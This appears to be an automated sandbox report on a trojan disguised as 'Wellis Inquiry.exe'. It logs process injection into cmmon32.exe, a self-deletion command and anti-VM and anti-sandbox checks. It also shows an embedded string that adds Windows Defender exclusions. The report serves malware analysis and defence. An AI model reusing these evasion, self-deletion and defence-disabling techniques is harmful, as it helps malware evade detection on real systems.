Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719650 NtQueryValueKey,LdrInitializeThunk,	11_2_04719650
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047196E0 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_047196E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047196D0 NtCreateKey,LdrInitializeThunk,	11_2_047196D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719710 NtQueryInformationToken,LdrInitializeThunk,	11_2_04719710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719FE0 NtCreateMutant,LdrInitializeThunk,	11_2_04719FE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719780 NtMapViewOfSection,LdrInitializeThunk,	11_2_04719780
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719860 NtQuerySystemInformation,LdrInitializeThunk,	11_2_04719860
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719840 NtDelayExecution,LdrInitializeThunk,	11_2_04719840
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719910 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_04719910
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047199A0 NtCreateSection,LdrInitializeThunk,	11_2_047199A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719A50 NtCreateFile,LdrInitializeThunk,	11_2_04719A50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719560 NtWriteFile,	11_2_04719560
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0471AD30 NtSetContextThread,	11_2_0471AD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719520 NtWaitForSingleObject,	11_2_04719520
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047195F0 NtQueryInformationFile,	11_2_047195F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719670 NtQueryInformationProcess,	11_2_04719670
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719610 NtEnumerateValueKey,	11_2_04719610
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0471A770 NtOpenThread,	11_2_0471A770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719770 NtSetInformationFile,	11_2_04719770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719760 NtOpenProcess,	11_2_04719760
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719730 NtQueryVirtualMemory,	11_2_04719730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0471A710 NtOpenProcessToken,	11_2_0471A710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047197A0 NtUnmapViewOfSection,	11_2_047197A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0471B040 NtSuspendThread,	11_2_0471B040
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719820 NtEnumerateKey,	11_2_04719820
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047198F0 NtReadVirtualMemory,	11_2_047198F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047198A0 NtWriteVirtualMemory,	11_2_047198A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719950 NtQueueApcThread,	11_2_04719950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047199D0 NtCreateProcessEx,	11_2_047199D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719A20 NtResumeThread,	11_2_04719A20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719A10 NtQuerySection,	11_2_04719A10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719A00 NtProtectVirtualMemory,	11_2_04719A00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719A80 NtOpenDirectoryObject,	11_2_04719A80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04719B00 NtSetValueKey,	11_2_04719B00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0471A3B0 NtGetContextThread,	11_2_0471A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D38690 NtReadFile,	11_2_02D38690
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D387C0 NtAllocateVirtualMemory,	11_2_02D387C0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D38710 NtClose,	11_2_02D38710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D385E0 NtCreateFile,	11_2_02D385E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3868A NtReadFile,	11_2_02D3868A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3870A NtClose,	11_2_02D3870A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D385DA NtCreateFile,	11_2_02D385DA

Source: Wellis Inquiry.exe	Binary or memory string: OriginalFilename vs Wellis Inquiry.exe
Source: Wellis Inquiry.exe, 00000000.00000002.673472401.00000000083A0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dll< vs Wellis Inquiry.exe
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameriched20.dllp( vs Wellis Inquiry.exe
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs Wellis Inquiry.exe
Source: Wellis Inquiry.exe	Binary or memory string: OriginalFilename vs Wellis Inquiry.exe
Source: Wellis Inquiry.exe, 00000003.00000002.747172824.00000000031A9000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameCMMON32.exe` vs Wellis Inquiry.exe
Source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Wellis Inquiry.exe
Source: Wellis Inquiry.exe	Binary or memory string: OriginalFilenameMutexAccessRu.exe8 vs Wellis Inquiry.exe

Source: Wellis Inquiry.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Wellis Inquiry.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Wellis Inquiry.exe 'C:\Users\user\Desktop\Wellis Inquiry.exe'
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wellis Inquiry.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@9/6

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Wellis Inquiry.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Wellis Inquiry.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: cmmon32.pdb source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Wellis Inquiry.exe, cmmon32.exe

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: Wellis Inquiry.exe, WinUsbInitForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Wellis Inquiry.exe.ff0000.0.unpack, WinUsbInitForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Wellis Inquiry.exe.ff0000.0.unpack, WinUsbInitForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Wellis Inquiry.exe.6a0000.0.unpack, WinUsbInitForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.Wellis Inquiry.exe.6a0000.1.unpack, WinUsbInitForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041B822 push eax; ret	3_2_0041B828
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041B82B push eax; ret	3_2_0041B892
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_004160E3 push 21204C73h; retf	3_2_004160E8
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041B88C push eax; ret	3_2_0041B892
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_004091C6 push eax; ret	3_2_004091CA
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00416278 push ebp; ret	3_2_00416274
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041621F push ebp; ret	3_2_00416274
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0040EE6C push edx; ret	3_2_0040EE6D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_00415EAC push FFFFFFABh; iretd	3_2_00415EBF
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0041B7D5 push eax; ret	3_2_0041B828
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_0120D0D1 push ecx; ret	3_2_0120D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0472D0D1 push ecx; ret	11_2_0472D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D36278 push ebp; ret	11_2_02D36274
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3621F push ebp; ret	11_2_02D36274
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D360E3 push 21204C73h; retf	11_2_02D360E8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3B88C push eax; ret	11_2_02D3B892
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3B822 push eax; ret	11_2_02D3B828
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3B82B push eax; ret	11_2_02D3B892
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D291C6 push eax; ret	11_2_02D291CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D35EAC push FFFFFFABh; iretd	11_2_02D35EBF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D2EE6C push edx; ret	11_2_02D2EE6D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_02D3B7D5 push eax; ret	11_2_02D3B828

Source: initial sample

Static PE information: section name: .text entropy: 7.93897204497

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'			Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.Wellis Inquiry.exe.339002c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Wellis Inquiry.exe PID: 7036, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000002D2899E second address: 0000000002D289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Wellis Inquiry.exe TID: 7040	Thread sleep time: -40370s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe TID: 7064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2848	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6880	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Code function: 3_2_004088D0 rdtsc

3_2_004088D0

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Thread delayed: delay time: 40370			Jump to behavior
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.679441377.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.709634080.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.679441377.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.672692112.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.697371801.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.713207756.000000000A897000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000004.00000000.679809243.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\Wellis Inquiry.exe

Code function: 3_2_004088D0 rdtsc

3_2_004088D0

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9100 mov eax, dword ptr fs:[00000030h]	3_2_011B9100
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9100 mov eax, dword ptr fs:[00000030h]	3_2_011B9100
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011B9100 mov eax, dword ptr fs:[00000030h]	3_2_011B9100
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E513A mov eax, dword ptr fs:[00000030h]	3_2_011E513A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E513A mov eax, dword ptr fs:[00000030h]	3_2_011E513A
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]	3_2_011D4120
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]	3_2_011D4120
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]	3_2_011D4120
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]	3_2_011D4120
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011D4120 mov ecx, dword ptr fs:[00000030h]	3_2_011D4120
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DB944 mov eax, dword ptr fs:[00000030h]	3_2_011DB944
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DB944 mov eax, dword ptr fs:[00000030h]	3_2_011DB944
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BB171 mov eax, dword ptr fs:[00000030h]	3_2_011BB171
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BB171 mov eax, dword ptr fs:[00000030h]	3_2_011BB171
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BC962 mov eax, dword ptr fs:[00000030h]	3_2_011BC962
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]	3_2_012749A4
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]	3_2_012749A4
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]	3_2_012749A4
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]	3_2_012749A4
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012369A6 mov eax, dword ptr fs:[00000030h]	3_2_012369A6
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E2990 mov eax, dword ptr fs:[00000030h]	3_2_011E2990
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011EA185 mov eax, dword ptr fs:[00000030h]	3_2_011EA185
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]	3_2_012351BE
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]	3_2_012351BE
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]	3_2_012351BE
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]	3_2_012351BE
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DC182 mov eax, dword ptr fs:[00000030h]	3_2_011DC182
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E61A0 mov eax, dword ptr fs:[00000030h]	3_2_011E61A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E61A0 mov eax, dword ptr fs:[00000030h]	3_2_011E61A0
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_012441E8 mov eax, dword ptr fs:[00000030h]	3_2_012441E8
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BB1E1 mov eax, dword ptr fs:[00000030h]	3_2_011BB1E1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BB1E1 mov eax, dword ptr fs:[00000030h]	3_2_011BB1E1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011BB1E1 mov eax, dword ptr fs:[00000030h]	3_2_011BB1E1
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]	3_2_011DA830
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]	3_2_011DA830
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]	3_2_011DA830
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]	3_2_011DA830
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]	3_2_011E002D
Source: C:\Users\user\Desktop\Wellis Inquiry.exe	Code function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]	3_2_011E002D
